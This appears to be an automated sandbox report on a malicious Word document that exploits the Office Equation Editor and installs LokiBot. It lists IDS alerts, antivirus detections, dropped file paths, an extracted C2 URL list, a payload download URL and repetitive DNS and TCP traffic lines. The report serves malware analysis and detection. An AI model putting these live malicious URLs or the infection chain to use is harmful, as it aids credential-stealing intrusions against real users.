ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:06.064261
SID:	2825766
Source Port:	49248
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:11.714251
SID:	2025381
Source Port:	49198
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:51.806006
SID:	2024313
Source Port:	49179
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:54.073092
SID:	2825766
Source Port:	49181
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:19:16.005968
SID:	2825766
Source Port:	49259
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:56.049434
SID:	2021641
Source Port:	49182
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:22.772748
SID:	2024313
Source Port:	49206
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:51.806006
SID:	2024318
Source Port:	49179
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:17:50.058542
SID:	2025381
Source Port:	49177
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:52.694696
SID:	2021641
Source Port:	49180
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:31.712532
SID:	2825766
Source Port:	49216
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:40.814233
SID:	2825766
Source Port:	49168
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.9

Timestamp:	05/23/24-20:18:40.275029
SID:	2825766
Source Port:	49220
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:57.920775
SID:	2021641
Source Port:	49184
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:12.597934
SID:	2024313
Source Port:	49255
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:19:03.316993
SID:	2024318
Source Port:	49245
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:28.376454
SID:	2025381
Source Port:	49212
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:31.712532
SID:	2021641
Source Port:	49216
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:18.079750
SID:	2025381
Source Port:	49201
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:12.597934
SID:	2024318
Source Port:	49255
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:59.521470
SID:	2825766
Source Port:	49241
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:19:03.316993
SID:	2024313
Source Port:	49245
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:16.882044
SID:	2021641
Source Port:	49260
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:06.064261
SID:	2021641
Source Port:	49248
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:07.888746
SID:	2825766
Source Port:	49250
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:48.359257
SID:	2024313
Source Port:	49229
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:51.088057
SID:	2024318
Source Port:	49232
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:56.909324
SID:	2024313
Source Port:	49238
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:52.425128
SID:	2825766
Source Port:	49233
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:16.270962
SID:	2024318
Source Port:	49199
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:56.909324
SID:	2024318
Source Port:	49238
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:16.270962
SID:	2024313
Source Port:	49199
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:48.359257
SID:	2024318
Source Port:	49229
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:59.837093
SID:	2025381
Source Port:	49186
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:57.792134
SID:	2825766
Source Port:	49239
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:47.441038
SID:	2825766
Source Port:	49228
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:51.088057
SID:	2024313
Source Port:	49232
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:44.106859
SID:	2024318
Source Port:	49171
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:00.736741
SID:	2021641
Source Port:	49187
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:29.294238
SID:	2025381
Source Port:	49213
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:16.882044
SID:	2825766
Source Port:	49260
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:44.106859
SID:	2024313
Source Port:	49171
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:47.441038
SID:	2021641
Source Port:	49228
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:53.400223
SID:	2024313
Source Port:	49234
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:30.098368
SID:	2825766
Source Port:	49214
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:45.625277
SID:	2025381
Source Port:	49226
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:53.400223
SID:	2024318
Source Port:	49234
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:49.147570
SID:	2024313
Source Port:	49176
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:18.441021
SID:	2024318
Source Port:	49262
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:46.332436
SID:	2024313
Source Port:	49173
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:46.332436
SID:	2024318
Source Port:	49173
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:18.441021
SID:	2024313
Source Port:	49262
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:48.088333
SID:	2021641
Source Port:	49175
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:49.147570
SID:	2024318
Source Port:	49176
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:56.093323
SID:	2025381
Source Port:	49237
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:20.882874
SID:	2825766
Source Port:	49204
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:19:04.226888
SID:	2025381
Source Port:	49246
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:47.208604
SID:	2024318
Source Port:	49174
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:47.208604
SID:	2024313
Source Port:	49174
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.9

Timestamp:	05/23/24-20:18:38.560340
SID:	2021641
Source Port:	49218
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.9

Timestamp:	05/23/24-20:18:38.560340
SID:	2825766
Source Port:	49218
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:08.863871
SID:	2025381
Source Port:	49251
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:07.888746
SID:	2021641
Source Port:	49250
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:20.882874
SID:	2021641
Source Port:	49204
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:43.784658
SID:	2025381
Source Port:	49224
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:02.368807
SID:	2024313
Source Port:	49189
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:42.915752
SID:	2825766
Source Port:	49223
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:57.792134
SID:	2021641
Source Port:	49239
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:02.368807
SID:	2024318
Source Port:	49189
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:48.088333
SID:	2825766
Source Port:	49175
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://kbfvzoboss.bid/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.top/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.win/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.trade/alien/fre.php	URL Reputation: Label: malware
Source: https://universalmovies.top/sharonzx.exe	Avira URL Cloud: Label: phishing
Source: http://rocheholding.top/evie3/five/fre.php	Avira URL Cloud: Label: malware
Source: https://universalmovies.top/	Avira URL Cloud: Label: phishing
Source: https://universalmovies.top/sharonzx.exeoC:	Avira URL Cloud: Label: phishing
Source: https://universalmovies.top/sharonzx.exej	Avira URL Cloud: Label: phishing
Source: https://universalmovies.top/sharonzx.exemmC:	Avira URL Cloud: Label: phishing
Source: rocheholding.top/evie3/five/fre.php	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "rocheholding.top/evie3/five/fre.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharonzx[1].exe	ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)	ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	ReversingLabs: Detection: 41%

Multi AV Scanner detection for submitted file

Source: SCB REmittance Advice.doc

ReversingLabs: Detection: 42%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharonzx[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Joe Sandbox ML: detected

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 104.21.74.191 Port: 443

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\sharon38892.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\sharon38892.exe			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49163 version: TLS 1.2

Source:	Binary string: XRoS.pdb source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr
Source:	Binary string: XRoS.pdbSHA256 source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 4x nop then jmp 046F18B1h		5_2_046F1B78
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 4x nop then jmp 01F50FF1h		14_2_01F512B4

Source: global traffic	DNS query: name: universalmovies.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top
Source: global traffic	DNS query: name: rocheholding.top

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
